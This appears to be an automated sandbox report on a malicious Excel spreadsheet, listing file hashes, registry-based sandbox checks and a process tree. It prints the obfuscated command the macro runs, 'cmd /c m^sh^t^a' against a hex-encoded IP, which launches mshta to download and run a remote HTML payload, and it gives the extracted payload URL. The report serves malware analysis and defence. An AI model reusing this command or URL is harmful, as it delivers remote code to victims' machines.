Analysis
-
max time kernel
133s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
11-11-2024 18:00
Behavioral task
behavioral1
Sample
9e0360c60f4d808917d9f77d234a7412db2e673471f7a8e7aa0c6cb0af4b450d.xls
Resource
win7-20240729-en
Behavioral task
behavioral2
Sample
9e0360c60f4d808917d9f77d234a7412db2e673471f7a8e7aa0c6cb0af4b450d.xls
Resource
win10v2004-20241007-en
General
-
Target
9e0360c60f4d808917d9f77d234a7412db2e673471f7a8e7aa0c6cb0af4b450d.xls
-
Size
102KB
-
MD5
a8c9638fbe2369dcea2c111939094feb
-
SHA1
f14b244c6972c94a63468704f6bdb0c9da38eeef
-
SHA256
9e0360c60f4d808917d9f77d234a7412db2e673471f7a8e7aa0c6cb0af4b450d
-
SHA512
209382608340a289e98988540e5798abce794c29f7144789a916b396d61a4238ac6eb5a4d7c7be750577b83f32b42aaa1dffdc8a0623aad06d3b83c9e89a2e0b
-
SSDEEP
3072:n/k3hbdlylKsgqopeJBWhZFGkE+cL2NdAFxe53lGvFTQ3IzxgdrvxpU0OKvMB:/k3hbdlylKsgqopeJBWhZFVE+W2NdAOK
Malware Config
Extracted
http://185.7.214.7/fer/fe3.html
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 4316 4516 cmd.exe 82 -
Blocklisted process makes network request 1 IoCs
flow pid Process 19 3232 mshta.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 4516 EXCEL.EXE -
Suspicious use of SetWindowsHookEx 12 IoCs
pid Process 4516 EXCEL.EXE 4516 EXCEL.EXE 4516 EXCEL.EXE 4516 EXCEL.EXE 4516 EXCEL.EXE 4516 EXCEL.EXE 4516 EXCEL.EXE 4516 EXCEL.EXE 4516 EXCEL.EXE 4516 EXCEL.EXE 4516 EXCEL.EXE 4516 EXCEL.EXE -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 4516 wrote to memory of 4316 4516 EXCEL.EXE 85 PID 4516 wrote to memory of 4316 4516 EXCEL.EXE 85 PID 4316 wrote to memory of 3232 4316 cmd.exe 88 PID 4316 wrote to memory of 3232 4316 cmd.exe 88
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\9e0360c60f4d808917d9f77d234a7412db2e673471f7a8e7aa0c6cb0af4b450d.xls"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4516 -
C:\Windows\SYSTEM32\cmd.execmd /c m^sh^t^a h^tt^p^:/^/0xb907d607/fer/fe3.html2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:4316 -
C:\Windows\system32\mshta.exemshta http://0xb907d607/fer/fe3.html3⤵
- Blocklisted process makes network request
PID:3232
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms
Filesize1KB
MD5f773a2558ffdb1928b330d840e53d4fd
SHA1cf297ab984cb935a9c79be415cc3f4909c70ea5c
SHA256135b5c5570506fac9f7873a300d39d3dd7c3abe4de1836aa77818e34f520c466
SHA5128b0612a91f97ae2dda2cb3b58cb0bf19dca66cf48177d4a39deb92fe933e327fc432975700e3d6c9d868e4a3a435b3cb21c1bac29f1b11b45c197eefccb719d1